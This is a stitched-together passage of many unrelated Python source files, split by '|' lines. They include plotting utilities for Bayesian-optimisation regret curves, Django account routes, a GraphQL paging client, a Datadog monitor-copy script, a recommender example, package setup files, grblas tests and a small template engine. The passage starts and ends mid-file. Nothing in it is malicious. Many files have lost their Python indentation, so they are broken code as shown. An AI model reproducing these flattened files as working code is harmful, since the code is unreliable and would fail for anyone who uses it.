plot_with_upper_lower(x, median, lower, upper, color, ax, **plot_kwargs)
def plot_all(label2array,
ax,
logscale=True,
ylabel='Regret',
xlabel='BO Iters',
method='mean',
colors=COLORS.copy(),
**kwargs):
"""Plot all experiment results.
Args:
label2array: a dictionary with labels as keys and an array of results as
values.
ax: matplotlib.pyplot.axis.
logscale: use log scale for y axis if True.
ylabel: label for y axis.
xlabel: label for x axis.
method: plot mean and std, or median and percentile.
colors: dictionary mapping from label to color.
**kwargs: other plot arguments.
"""
assert len(label2array) <= len(
colors
  ), f'max number of lines to plot is {len(colors)}, got {len(label2array)}'
exp_types = label2array.keys()
iteritems = []
for label in exp_types:
if label not in colors:
iteritems = zip(list(colors.values())[:len(exp_types)], exp_types)
print(f'Colors not assigned to {label}.')
break
else:
iteritems += [(colors[label], label)]
for color, label in iteritems:
if label not in label2array or label2array[label] is None:
continue
y_array = np.array(label2array[label])
if method == 'mean':
plot_array_mean_std(y_array, ax=ax, label=label, color=color, **kwargs)
elif method == 'median':
plot_array_median_percentile(
y_array, ax=ax, label=label, color=color, **kwargs)
if logscale:
ax.set_yscale('log')
ax.legend()
ax.set_xlabel(xlabel)
ax.set_ylabel(ylabel)
def set_violin_axis_style(ax, labels):
"""Set the style of an axis on a violin plot."""
ax.xaxis.set_tick_params(direction='out')
ax.xaxis.set_ticks_position('bottom')
ax.set_xticks(np.arange(1, len(labels) + 1))
ax.set_xticklabels(labels, rotation=45)
ax.set_xlim(0.5, len(labels) + 0.5)
def plot_summary(labels,
label2array,
xlim=100,
ylim=None,
logscale=True,
ylabel='Regret',
xlabel='BO Iters',
method='mean',
title=None,
violin_trials=None,
violin_labels=None,
figsize=(24, 6),
colors=COLORS.copy(),
axes=None,
uppercenter_legend=True,
uppercenter_legend_ncol=3,
bbox_to_anchor=(0.5, 1.1),
**kwargs):
"""Plot a summary of results with options to add violin plots on slices.
Args:
labels: list of labels to be included in the plot.
label2array: a dictionary with labels as keys and an array of results as
values.
xlim: a tuple of the new x-axis limits.
ylim: a tuple of the new y-axis limits.
logscale: use log scale for y axis if True.
ylabel: label for y axis.
xlabel: label for x axis.
method: plot mean and std, or median and percentile.
title: title of the plot.
violin_trials: list of trials to plot violin plots on slices of the figure.
    violin_labels: list of labels to be included in violin plots.
figsize: a tuple describing the size of the figure.
colors: dictionary mapping from label to color.
axes: list of matplotlib.pyplot.axis objects.
uppercenter_legend: use an upper center legend if True.
uppercenter_legend_ncol: number of columns for the upper center legend.
bbox_to_anchor: bbox_to_anchor of the upper center legend.
**kwargs: other plot arguments.
"""
plt.figure(dpi=1500)
  n_violins = len(violin_trials) if violin_trials else 0
  if axes is None or len(axes) < n_violins + 1:
    _, axes = plt.subplots(
        nrows=1, ncols=n_violins + 1, figsize=figsize)
plot_all({la: label2array.get(la, None) for la in labels},
axes[0],
logscale=logscale,
ylabel=ylabel,
xlabel=xlabel,
method=method,
colors=colors,
**kwargs)
axes[0].set_xlim(0, xlim)
if uppercenter_legend:
axes[0].legend(
loc='upper center',
bbox_to_anchor=bbox_to_anchor,
ncol=uppercenter_legend_ncol,
fancybox=True,
shadow=True)
else:
axes[0].legend()
if ylim:
axes[0].set_ylim(ylim[0], ylim[1])
if title:
axes[0].set_title(title)
if not violin_trials or not violin_labels:
return
labels = violin_labels
for i, trial in enumerate(violin_trials):
data = [np.array(label2array[la])[:, trial] for la in labels]
quartile1, medians, quartile3 = np.percentile(
np.array(data), [20, 50, 80], axis=1)
parts = axes[i + 1].violinplot(data, showmedians=False, showextrema=False)
inds = np.arange(1, len(medians) + 1)
axes[i + 1].scatter(
inds, medians, marker='o', color='white', s=30, zorder=3)
axes[i + 1].vlines(
inds, quartile1, quartile3, color='k', linestyle='-', lw=5)
for pc, la in zip(parts['bodies'], labels):
pc.set_facecolor(colors[la])
pc.set_edgecolor('black')
pc.set_alpha(1)
axes[i + 1].set_title(f'BO Iters = {trial+1}')
set_violin_axis_style(axes[i + 1], labels)
|
from django.urls import path
from django.contrib.auth import views as auth_views
from . import views
urlpatterns = [
path('', views.profile, name='profile'),
path('login', views.login_view, name='login'),
path('logout', views.logout_view, name='logout'),
path('register', views.register, name='register'),
path('delete-profile', views.delete_profile, name='delete-profile'),
# Password reset via profile
path(
'logged_in_password_reset',
views.logged_in_password_reset,
name='logged_in_password_reset',
),
# Password reset procedure via email link
path('password_reset', views.password_reset, name='password_reset'),
path(
'password_reset/done',
auth_views.PasswordResetDoneView.as_view(
template_name='accounts/password_reset_done.html'
),
name='password_reset_done',
),
path(
'reset/<uidb64>/<token>',
auth_views.PasswordResetConfirmView.as_view(
template_name='accounts/password_reset_confirm.html'
),
name='password_reset_confirm',
),
path(
'reset/done',
auth_views.PasswordResetCompleteView.as_view(
template_name='accounts/password_reset_complete.html'
),
name='password_reset_complete',
),
]
|
from typing import Dict, Any
from enum import Enum
from indico.errors import IndicoRequestError
import time
class HTTPMethod(Enum):
GET = "GET"
POST = "POST"
PUT = "PUT"
DELETE = "DELETE"
HEAD = "HEAD"
OPTIONS = "OPTIONS"
class HTTPRequest:
def __init__(self, method: HTTPMethod, path: str, **kwargs):
self.method = method
self.path = path
self.kwargs = kwargs
def process_response(self, response):
return response
class GraphQLRequest(HTTPRequest):
def __init__(self, query: str, variables: Dict[str, Any] = None):
self.query = query
self.variables = variables
self.method = HTTPMethod.POST
self.path = "/graph/api/graphql"
@property
def kwargs(self):
return {"json": {"query": self.query, "variables": self.variables}}
def process_response(self, response):
response = super().process_response(response)
errors = response.pop("errors", [])
if errors:
extras = {"locations": [error.pop("locations", None) for error in errors]}
raise IndicoRequestError(
error="\n".join(error["message"] for error in errors),
code=400,
extras=extras,
)
return response["data"]
class PagedRequest(GraphQLRequest):
"""
To enable pagination, query must include $after as an argument
and request pageInfo
query Name(
...
$after: Int
){
items(
...
after: $after
){
items {...}
pageInfo {
endCursor
hasNextPage
}
}
}
"""
def __init__(self, query: str, variables: Dict[str, Any] = None):
variables["after"] = None
self.has_next_page = True
super().__init__(query, variables=variables)
def process_response(self, response):
response = super().process_response(response)
_pg = next(iter(response.values()))["pageInfo"]
self.has_next_page = _pg["hasNextPage"]
self.variables["after"] = _pg["endCursor"] if self.has_next_page else None
return response
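# Minimal usage sketch (the `client.call` below is hypothetical and shown only
# for illustration; the real client interface lives outside this module). A
# PagedRequest is re-issued until pageInfo.hasNextPage is False, with the
# `after` cursor advanced by process_response() on every page:
#
#   req = PagedRequest(query, variables={"limit": 100})
#   while req.has_next_page:
#       page = client.call(req)  # assumed to invoke req.process_response()
#       ...                      # consume the items in `page`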
class RequestChain:
previous: Any = None
result: Any = None
def requests(self):
pass
class Debouncer:
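    """Linear backoff helper: each backoff() sleeps one second longer than the
    previous call, capped at max_timeout seconds."""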
def __init__(self, max_timeout: int = 5):
self.timeout = 0
self.max_timeout = max_timeout or 5 # prevent None and 0
def backoff(self):
self.increment_timeout()
time.sleep(self.timeout)
def increment_timeout(self):
if self.timeout < self.max_timeout:
self.timeout += 1
|
#!/usr/bin/env python
from datadog import initialize, api
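# Copies every monitor from SOURCE_ACCOUNT to DEST_ACCOUNT: the API client is
# first initialized with the source keys to fetch all monitors, then
# re-initialized with the destination keys to recreate each one (see the loop
# at the bottom of this script).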
def initialize_dd_api(account):
options = {
'api_key': configs[account]["api_key"],
'app_key': configs[account]["app_key"]
}
initialize(**options)
class Monitor:
def __init__(self,type,query,name,message,tags,options):
self.type = type
self.query = query
self.name = name
self.message = message
self.tags = tags
self.options = options
def print_monitor(self):
print("\n\n{}".format(self.__dict__))
def create_monitor(self):
create_monitor_request = api.Monitor.create(
type = self.type,
query = self.query,
name = self.name,
message = self.message,
tags = self.tags,
options = self.options
)
return create_monitor_request
configs = {
"SOURCE_ACCOUNT" : {
"api_key" : "SOURCE_ACCOUNT_API_KEY",
"app_key" : "SOURCE_ACCOUNT_APP_KEY"
},
"DEST_ACCOUNT" : {
"api_key" : "DEST_ACCOUNT_API_KEY",
"app_key" : "DEST_ACCOUNT_APP_KEY"
}
}
initialize_dd_api("SOURCE_ACCOUNT")
monitors = api.Monitor.get_all()
initialize_dd_api("DEST_ACCOUNT")
for m in monitors:
new_monitor = Monitor(
type = m["type"],
query = m["query"],
name = m["name"],
tags = m["tags"],
options = m["options"],
message = m["message"]
)
new_monitor.print_monitor()
new_monitor.create_monitor()
del new_monitor
|
# Copyright 2018 The Cornac Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Example for Collaborative Deep Learning (CDL)"""
import cornac
from cornac.data import Reader
from cornac.datasets import citeulike
from cornac.eval_methods import RatioSplit
from cornac.data import TextModality
from cornac.data.text import BaseTokenizer
# CDL composes an autoencoder with matrix factorization to model item (article) texts and user-item preferences
# The necessary data can be loaded as follows
docs, item_ids = citeulike.load_text()
feedback = citeulike.load_feedback(reader=Reader(item_set=item_ids))
# Instantiate a TextModality, it makes it convenient to work with text auxiliary information
# For more details, please refer to the tutorial on how to work with auxiliary data
item_text_modality = TextModality(
corpus=docs,
ids=item_ids,
tokenizer=BaseTokenizer(stop_words="english"),
max_vocab=8000,
max_doc_freq=0.5,
)
# Define an evaluation method to split feedback into train and test sets
ratio_split = RatioSplit(
data=feedback,
test_size=0.2,
exclude_unknowns=True,
item_text=item_text_modality,
verbose=True,
seed=123,
rating_threshold=0.5,
)
# Instantiate CDL model
cdl = cornac.models.CDL(
k=50,
autoencoder_structure=[200],
max_iter=30,
lambda_u=0.1,
lambda_v=1,
lambda_w=0.1,
lambda_n=1000,
seed=123
)
# Use Recall@300 for evaluation
rec_300 = cornac.metrics.Recall(k=300)
# Put everything together into an experiment and run it
cornac.Experiment(eval_method=ratio_split, models=[cdl], metrics=[rec_300]).run()
|
from setuptools import setup, find_packages
from os import path
this_dir = path.abspath(path.dirname(__file__))
with open(path.join(this_dir, "README.md"), encoding="utf-8") as f:
long_description = f.read()
setup(
name="gretel-client",
author='Gretel Labs, Inc.',
author_email='open-source@gretel.ai',
use_scm_version=True,
setup_requires=["setuptools_scm"],
description="Python bindings for the Gretel API",
url='https://github.com/gretelai/gretel-python-client',
long_description=long_description,
long_description_content_type="text/markdown",
entry_points={"console_scripts": ["gretel=gretel_client.cli:main"]},
package_dir={"": "src"},
packages=find_packages("src"),
install_requires=[
"faker==4.1.1",
"requests>=2.24.0,<3",
"smart_open>=2.1.0,<3",
"tqdm==4.45.0",
"tenacity==6.2.0",
'dataclasses;python_version<"3.7"'
],
extras_require={
"pandas": ["pandas>=1.1.0,<1.2"],
"fpe": ["numpy", "pycryptodome==3.9.8", "dateparser==0.7.6"]
},
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: Apache Software License",
"Operating System :: POSIX :: Linux",
"Operating System :: MacOS",
"Operating System :: Microsoft :: Windows"
]
)
|
import json
excludeSets = ['Homelands']
with open('Old Rarities.json', 'r') as f:
# Cards include name and rarity fields
setNameToCards = json.loads(f.read())
for setName in setNameToCards:
if (setName in excludeSets):
continue
rarities = setNameToCards[setName]
with open(setName, 'r') as f:
prices = json.loads(f.read())
print('%s: %s, %s' % (setName, len(rarities), len(prices)))
|
import os
from loggers import AMC_HOLDING_DIR_PATH, linespace, prgm_end, finish, NO_FILES_IN_DIR_MSG
dir_path = f"./{AMC_HOLDING_DIR_PATH}"
fund_files = os.listdir(dir_path)
# in case the folder is empty
if len(fund_files) == 0:
print(NO_FILES_IN_DIR_MSG)
exit(0)
print(f"Comparing {len(fund_files)} AMCs")
company_list = []
amc_details = {}
for c_name in fund_files:
f_path = f"{AMC_HOLDING_DIR_PATH}/{c_name}"
with open(f_path,'r') as fund_name:
c_list = [i for i in fund_name.readlines()]
amc_details[c_name] = c_list
company_list.append(set(c_list))
unique_company_list = set.union(*company_list)
print(f"No. of Unique Companies : {len(unique_company_list)}")
linespace()
result = { i : [] for i in unique_company_list } # str : []
for company_name in unique_company_list:
for amc_name in amc_details.keys():
if company_name in amc_details[amc_name]:
result[company_name].append(amc_name)
counter = 1
for cname in sorted(result.keys(),key=str.casefold):
print(f"[{counter}]. {cname}")
for amcs in result[cname]:
print(f"\t- {amcs}")
counter += 1
linespace()
prgm_end()
finish()
|
from typing import List
from collections import defaultdict
import logging
from django.conf import settings
from online_payments.billing.enums import Currency
from online_payments.billing.models import Item, PaymentMethod, Invoice, Customer
from online_payments.billing.szamlazzhu import Szamlazzhu
from payments.prices import PRODUCTS, get_product_items
logger = logging.getLogger(__name__)
def send_seat_invoice(seat):
_send_invoice(seat.appointment.billing_detail, seat.appointment.email, _get_items_for_seats([seat]))
def send_appointment_invoice(appointment):
_send_invoice(appointment.billing_detail, appointment.email, _get_items_for_seats(appointment.seats.all()))
def _get_items_for_seats(seats) -> List[Item]:
grouped_products = defaultdict(int)
for seat in seats:
grouped_products[seat.payment.product_type] += 1
items = []
for product_type, quantity in grouped_products.items():
items.extend(get_product_items(PRODUCTS[product_type], quantity))
return items
def _send_invoice(billing_detail, email, items):
customer = Customer(
name=billing_detail.company_name,
post_code=billing_detail.post_code,
city=billing_detail.city,
address=billing_detail.address_line1,
email=email,
tax_number=billing_detail.tax_number,
)
invoice = Invoice(items=items, payment_method=PaymentMethod.CREDIT_CARD, customer=customer)
szamlazzhu = Szamlazzhu(settings.SZAMLAZZHU_AGENT_KEY, Currency.HUF)
logger.info("Sending invoice to: %s", email)
szamlazzhu.send_invoice(invoice, settings.SZAMLAZZHU_INVOICE_PREFIX)
|
# GENERATED BY KOMAND SDK - DO NOT EDIT
from .create_query.action import CreateQuery
from .get_query.action import GetQuery
from .run_query.action import RunQuery
|
# This file is part of Pynguin.
#
# Pynguin is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Pynguin is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Pynguin. If not, see <https://www.gnu.org/licenses/>.
import inspect
from typing import Union
import pytest
from pynguin.typeinference.strategy import InferredSignature
def _dummy(x: int, y: int) -> int:
return x * y
@pytest.fixture
def signature():
return inspect.signature(_dummy)
@pytest.fixture
def inferred_signature(signature):
return InferredSignature(
signature=signature, parameters={"x": int, "y": int}, return_type=int,
)
def test_update_parameter_type(inferred_signature):
inferred_signature.update_parameter_type("x", Union[int, float])
assert inferred_signature.parameters["x"] == Union[int, float]
assert inferred_signature.signature.parameters["x"] == inspect.Parameter(
name="x",
kind=inspect.Parameter.POSITIONAL_OR_KEYWORD,
annotation=Union[int, float],
)
def test_update_return_type(inferred_signature):
inferred_signature.update_return_type(Union[int, float])
assert inferred_signature.return_type == Union[int, float]
assert inferred_signature.signature.return_annotation == Union[int, float]
def test_update_non_existing_parameter(inferred_signature):
with pytest.raises(AssertionError):
inferred_signature.update_parameter_type("b", bool)
|
########################################################################
##
## Copyright 2015 PMC-Sierra, Inc.
## Copyright 2018 Eidetic Communications Inc.
##
## Licensed under the Apache License, Version 2.0 (the "License"); you
## may not use this file except in compliance with the License. You may
## obtain a copy of the License at
## http://www.apache.org/licenses/LICENSE-2.0 Unless required by
## applicable law or agreed to in writing, software distributed under the
## License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
## CONDITIONS OF ANY KIND, either express or implied. See the License for
## the specific language governing permissions and limitations under the
## License.
##
########################################################################
import sys
import time
import curses
class DummyContext(object):
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
pass
class Timeline(DummyContext):
def __init__(self, period=1.0, *args, **kwargs):
super().__init__(*args, **kwargs)
self.period = period
self.last_time = time.time() - period
self.duration = None
self.first = True
def wait_until_ready(self):
tm = self.last_time + self.period
if tm > time.time():
time.sleep(tm - time.time())
def next(self):
self.wait_until_ready()
if not self.first:
self.duration = time.time() - self.last_time
self.first = False
self.last_time = time.time()
class CursesContext(object):
def __enter__(self):
curses.setupterm()
self.cmd("smcup")
return self
def __exit__(self, type, value, traceback):
self.cmd("rmcup")
def cmd(self, name, *args):
s = curses.tigetstr(name)
sys.stdout.buffer.write(curses.tparm(s, *args))
def clear(self):
self.cmd("clear")
self.cmd("cup", 0, 0)
|
def pattern(n):
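    """Return n lines of the digits 1..n (each taken mod 10), with the digit block
    shifted one column further left on each line; e.g. pattern(3) gives the lines
    "  123", " 123 ", "123  " joined by newlines."""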
return "\n".join(" "*(n-1-i)+"".join([str(i%10) for i in range(1,n+1)])+" "*i for i in range(n))
|
"""FunCLI Package installer."""
from setuptools import find_packages, setup
setup(name='CLIFun',
version='0.0',
packages=find_packages(),
include_package_data=True,
install_requires=['Click',
'Fabric',
'laboratory', ],
entry_points={
'console_scripts': 'f=cli_fun.__main__:main'
}, )
|
from pytest import fixture, raises
from grblas import op, monoid, Scalar, Vector, Matrix
from grblas.exceptions import DimensionMismatch
@fixture
def v1():
return Vector.from_values([0, 2], [2.0, 5.0], name="v_1")
@fixture
def v2():
return Vector.from_values([1, 2], [3.0, 7.0], name="v_2")
@fixture
def A1():
return Matrix.from_values([0, 0], [0, 1], [0.0, 4.0], ncols=3, name="A_1")
@fixture
def A2():
return Matrix.from_values([0, 2], [0, 0], [6.0, 8.0], name="A_2")
@fixture
def s1():
return Scalar.from_value(3, name="s_1")
def test_ewise(v1, v2, A1, A2):
for left, right in [
(v1, v2),
(A1, A2.T),
(A1.T, A1.T),
(A1, A1),
]:
expected = left.ewise_mult(right, monoid.plus).new()
assert expected.isequal(monoid.plus(left & right).new())
assert expected.isequal(monoid.plus[float](left & right).new())
if isinstance(left, Vector):
assert (left & right).size == left.size
assert (left | right).size == left.size
else:
assert (left & right).nrows == left.nrows
assert (left | right).nrows == left.nrows
assert (left & right).ncols == left.ncols
assert (left | right).ncols == left.ncols
expected = left.ewise_add(right, op.plus).new()
assert expected.isequal(op.plus(left | right).new())
assert expected.isequal(op.plus[float](left | right).new())
expected = left.ewise_mult(right, op.minus).new()
assert expected.isequal(op.minus(left & right).new())
expected = left.ewise_add(right, op.minus, require_monoid=False).new()
assert expected.isequal(op.minus(left | right, require_monoid=False).new())
def test_matmul(v1, v2, A1, A2):
for method, left, right in [
("vxm", v2, A2),
("vxm", v2, A1.T),
("mxv", A1, v1),
("mxv", A2.T, v1),
("mxm", A1, A2),
("mxm", A1.T, A2.T),
("mxm", A1, A1.T),
("mxm", A2.T, A2),
]:
expected = getattr(left, method)(right, op.plus_times).new()
assert expected.isequal(op.plus_times(left @ right).new())
assert expected.isequal(op.plus_times[float](left @ right).new())
if isinstance(left, Vector):
assert (left @ right).size == right.ncols
assert op.plus_times(left @ right).size == right.ncols
elif isinstance(right, Vector):
assert (left @ right).size == left.nrows
assert op.plus_times(left @ right).size == left.nrows
else:
assert (left @ right).nrows == left.nrows
assert (left @ right).ncols == right.ncols
def test_bad_ewise(s1, v1, A1, A2):
for left, right in [
(v1, s1),
(s1, v1),
(v1, 1),
(1, v1),
(v1, A1),
(A1, v1),
(v1, A1.T),
(A1.T, v1),
(A1, s1),
(s1, A1),
(A1.T, s1),
(s1, A1.T),
(A1, 1),
(1, A1),
]:
with raises(TypeError, match="Bad type for argument"):
left | right
with raises(TypeError, match="Bad type for argument"):
left & right
w = v1[: v1.size - 1].new()
with raises(DimensionMismatch):
v1 | w
with raises(DimensionMismatch):
v1 & w
with raises(DimensionMismatch):
A2 | A1
with raises(DimensionMismatch):
A2 & A1
with raises(DimensionMismatch):
A1.T | A1
with raises(DimensionMismatch):
A1.T & A1
with raises(TypeError):
s1 | 1
with raises(TypeError):
1 | s1
with raises(TypeError):
s1 & 1
with raises(TypeError):
1 & s1
with raises(TypeError, match="Using __ior__"):
v1 |= v1
with raises(TypeError, match="Using __ior__"):
A1 |= A1
with raises(TypeError, match="Using __iand__"):
v1 &= v1
with raises(TypeError, match="Using __iand__"):
A1 &= A1
with raises(TypeError, match="require_monoid"):
op.minus(v1 | v1)
with raises(TypeError):
op.minus(v1 & v1, require_monoid=False)
with raises(TypeError, match="Bad types when calling binary.plus"):
op.plus(v1 & v1, 1)
def test_bad_matmul(s1, v1, A1, A2):
for left, right in [
(v1, s1),
(s1, v1),
(v1, 1),
(1, v1),
(A1, s1),
(s1, A1),
(A1.T, s1),
(s1, A1.T),
(A1, 1),
(1, A1),
]:
with raises(TypeError, match="Bad type for argument"):
left @ right
with raises(DimensionMismatch):
v1 @ A1
with raises(DimensionMismatch):
A1.T @ v1
with raises(DimensionMismatch):
A2 @ v1
with raises(DimensionMismatch):
v1 @ A2.T
with raises(DimensionMismatch):
A1 @ A1
with raises(DimensionMismatch):
A1.T @ A1.T
with raises(TypeError, match="__imatmul__"):
A1 @= A1
with raises(TypeError):
s1 @ 1
with raises(TypeError):
1 @ s1
with raises(TypeError, match="Bad type when calling semiring.plus_times"):
op.plus_times(A1)
with raises(TypeError, match="Bad types when calling semiring.plus_times."):
op.plus_times(A1, A2)
with raises(TypeError, match="Bad types when calling semiring.plus_times."):
op.plus_times(A1 @ A2, 1)
def test_apply_unary(v1, A1):
expected = v1.apply(op.exp).new()
assert expected.isequal(op.exp(v1).new())
assert expected.isequal(op.exp[float](v1).new())
expected = A1.apply(op.exp).new()
assert expected.isequal(op.exp(A1).new())
def test_apply_unary_bad(s1, v1):
with raises(TypeError, match="__call__"):
op.exp(v1, 1)
with raises(TypeError, match="__call__"):
op.exp(1, v1)
with raises(TypeError, match="Bad type when calling unary.exp"):
op.exp(s1)
with raises(TypeError, match="Bad type when calling unary.exp"):
op.exp(1)
with raises(TypeError, match="Bad type when calling unary.exp"):
op.exp(v1 | v1)
def test_apply_binary(v1, A1):
expected = v1.apply(monoid.plus, right=2).new()
assert expected.isequal(monoid.plus(v1, 2).new())
assert expected.isequal(monoid.plus[float](v1, 2).new())
expected = v1.apply(op.minus, right=2).new()
assert expected.isequal(op.minus(v1, 2).new())
assert expected.isequal(op.minus[float](v1, 2).new())
expected = v1.apply(op.minus, left=2).new()
assert expected.isequal(op.minus(2, v1).new())
expected = A1.apply(op.minus, right=2).new()
assert expected.isequal(op.minus(A1, 2).new())
expected = A1.apply(op.minus, left=2).new()
assert expected.isequal(op.minus(2, A1).new())
def test_apply_binary_bad(s1, v1):
with raises(TypeError, match="Bad types when calling binary.plus"):
op.plus(1, 1)
with raises(TypeError, match="Bad type when calling binary.plus"):
op.plus(v1)
with raises(TypeError, match="Bad type for keyword argument `right="):
op.plus(v1, v1)
with raises(TypeError, match="may only be used when performing an ewise_add"):
op.plus(v1, 1, require_monoid=False)
|
# Define class CoeffVar
class CoeffVar(object):
    coefficient = 1
    @classmethod  # turn method mul into a class method
    def mul(cls, fact):  # the first argument is cls
        return cls.coefficient * fact
# Define class MulFive, which inherits from CoeffVar
class MulFive(CoeffVar):
    coefficient = 5
x = MulFive.mul(4)  # CoeffVar.mul(MulFive, 4) -> 20
|
import sys
sys.path.append("../Structures/")
import graph
from dfs import Dfs
from collections import deque
class Scc:
def execute(self, G):
dfs = Dfs()
dfs.executeNormal(G)
G.buildTranspGraph()
dfs.executeTransp(G)
self.printScc(G, dfs.getSccList())
    def printScc(self, G, sccList):
        for v in sccList:
            if v.getPi() is None:
                print(v.getName())
            else:
                print(v.getName(), end=' ')
|
import re
from collections import namedtuple
from .exceptions import ParseError, ExpressionNotClosed
from .exceptions import NotClosedError, StatementNotFound
from .exceptions import StatementNotAllowed, UnexpectedClosingFound
from .registry import Registry
class Node:
def __init__(self, parent=None):
self.code = ""
self.parent = parent
def render(self, context):
return self.code
def __str__(self):
return "Plain node ----\n{}\n----\n".format(self.code)
class TextNode(Node):
def __init__(self, text, parent=None):
super().__init__(parent=parent)
self.text = text
def render(self, context):
return self.text
def __str__(self):
return "Text node ----\n{}\n----\n".format(self.text)
class ExpressionNode(Node):
def __init__(self, expression, parent=None):
super().__init__(parent=parent)
self.expression = expression
def render(self, context):
return str(context.eval(self.expression))
def __str__(self):
return "Statement node ----\n{}\n----\n".format(self.expression)
class StatementNode(Node):
open = ''
def __init__(self, type, expression="", parent=None):
super().__init__(parent=parent)
self.type = type
self.expression = expression
def compile(self, code, index=0):
return index
class CommentNode(StatementNode):
def __init__(self, expression="", parent=None):
super().__init__("comment", expression=expression, parent=parent)
class BlockStatementNode(StatementNode):
closing = None
has_block = True
def __init__(self, type, expression="", nodes=None, parent=None):
super().__init__(type, expression, parent=parent)
self.nodes = nodes or []
def render(self, context):
# The blockstatement itself will probably render to nothing
# so just include the childnodes
res = []
for node in self.nodes:
res.append(node.render(context))
return res
def __str__(self):
return "BlockStatement node {}----\n{}\n----\n".format(
self.type, self.code)
def __iter__(self):
return self.nodes
def find_start_block(self, code):
""" find the start of the nearest block: {{ {% or {# """
indexes = []
for start in ('{%', '{{', '{#'):
index = code.find(start)
if index != -1:
indexes.append(index)
if indexes:
return min(indexes)
return -1
def compile(self, pc, index=0):
res = []
code = pc.code
closing = self.closing
closing_found = closing is None
while index < len(code):
first_marker = self.find_start_block(code[index:])
if first_marker == -1:
res.append(TextNode(code[index:]))
index = len(code)
break
if first_marker > 0:
# Is there any text to put in a node?
res.append(TextNode(code[index:index + first_marker]))
index += first_marker
if closing and re.match("{{%\s*{}\s*%}}".format(closing),
code[index:]):
closing_found = True
index += code[index:].find("%}") + 2
break
node, skip = CompileStatement(pc[index:], parent=self)
res.append(node)
index += skip
if not closing_found:
raise ParseError("Closing tag {} not found".format(closing),
pc)
self.nodes = res
self.code = code[:index]
return index
class MainNode(BlockStatementNode):
pass
class FillBlockStatementNode(BlockStatementNode):
open = 'fill'
closing = 'endfill'
class ForBlockStatementNode(BlockStatementNode):
open = 'for'
closing = 'endfor'
def looper(self, sequence):
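        """Yield (loop, element) pairs, where loop is a namedtuple exposing
        positional info (index=i, index0=i+1, first, last) as the template's
        'loop' variable."""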
looptype = namedtuple("Loop", ["index", "index0", "first", "last"])
l = len(sequence)
for i, v in enumerate(sequence):
yield looptype(i, i + 1, i == 0, i == l - 1), v
def render(self, context):
var, _in, expr = self.expression.partition(" in ")
var = var.strip()
seq = context.eval(expr.strip())
res = []
for loop, element in self.looper(seq):
context.push({var: element, 'loop': loop})
for node in self.nodes:
res.append(node.render(context))
context.pop()
return res
class IfBlockStatementNode(BlockStatementNode):
open = 'if'
closing = 'endif'
def render(self, context):
res = []
t, f = [], []
current = t
for node in self.nodes:
if isinstance(node, ElseInIfStatementNode):
current = f
else:
current.append(node)
if context.eval(self.expression):
for node in t:
res.append(node.render(context))
else:
for node in f:
res.append(node.render(context))
return res
class ElseInIfStatementNode(StatementNode):
""" Should only be allowed inside if blockstatement """
open = 'else'
class SlotStatementNode(BlockStatementNode):
open = 'slot'
closing = 'endslot'
def render(self, context):
res = []
blockname = self.expression or "main"
block_found = False
# is there a child to pop? E.g. rendering base template directly
if context.child():
with context.popchild() as tpl:
for node in tpl.mainnode.nodes:
if isinstance(node, FillBlockStatementNode):
block_found = True
if node.expression == blockname:
res.append(node.render(context))
break
else:
if not block_found:
# use entire template as matching block
block_found = True
res.append(tpl.render_with_context(
context,
start_at_parent=False))
else:
# render the body of the block
for node in self.nodes:
res.append(node.render(context))
else:
# render the body of the block
for node in self.nodes:
res.append(node.render(context))
return res
registry = Registry()
registry.register('for', ForBlockStatementNode, MainNode)
registry.register('if', IfBlockStatementNode, MainNode)
registry.register('else', ElseInIfStatementNode,
IfBlockStatementNode, direct=True)
# registry.register('else', ForBlockStatementNode, direct=True)
registry.register('slot', SlotStatementNode, MainNode)
registry.register('fill', FillBlockStatementNode, MainNode)
def parse_expression(code, start="{{", end="}}"):
""" parse any expression surrounded by start/end,
supporting string expressions containing start/end
markers. Code may contain trailing code
return index where parsing ends including parsing of endmarker
"""
assert code[:2] == start
escape_mode = False
string_mode = '' # can be ' " or empty
res = ''
for index in range(2, len(code)):
c = code[index]
if string_mode:
if not escape_mode:
if c == string_mode:
string_mode = False
if c == '\\':
escape_mode = True
else:
escape_mode = False
elif c in "'\"":
string_mode = c
elif code[index:index + 2] == end:
# 'end' ends the expression and we're not inside a string
index += 1 # we read one } ahead (assume end is 2 characters)
break
res += c
else:
raise ExpressionNotClosed()
return res, index + 1
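# Usage sketch for parse_expression (values traced from the code above): string
# literals inside the expression may contain the end marker without closing it,
#   expr, end = parse_expression('{{ "}}" }} tail')
#   expr -> ' "}}" '   (the quoted "}}" is kept, surrounding spaces included)
#   end  -> 10         (index just past the closing "}}")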
def parse_statement(code):
""" parse
{% stmnt expr %}
where "expr" may contain a string containing '%}'
"""
r = parse_expression(code, start='{%', end='%}')
return r
def parse_comment(code):
r = parse_expression(code, start='{#', end='#}')
return r
def CompileStatement(pc, parent=None):
""" Either a block statement {% or expression statement {{
has started. Figure out what it is and parse it
"""
parent = parent or MainNode("main")
# we have a parse context. catch errors and add line numbers etc?
if pc.code[1] == '{': # expression statement
try:
expr, end = parse_expression(pc.code)
except ExpressionNotClosed as e:
raise ParseError("Expression not closed", pc) from e
return ExpressionNode(expr), end
if pc.code[1] == '#': # comment
try:
expr, end = parse_comment(pc.code)
except ExpressionNotClosed as e:
raise ParseError("Comment not closed", pc) from e
return CommentNode(expr), end
try:
statement, end = parse_statement(pc.code)
except ExpressionNotClosed as e:
raise ParseError("Statement not closed", pc) from e
statement = statement.strip()
main, _, expr = statement.partition(" ")
pc.tag = main
try:
klass = registry.find(main, parent)
except NotClosedError as e:
raise ParseError("Statement not closed", pc) from e
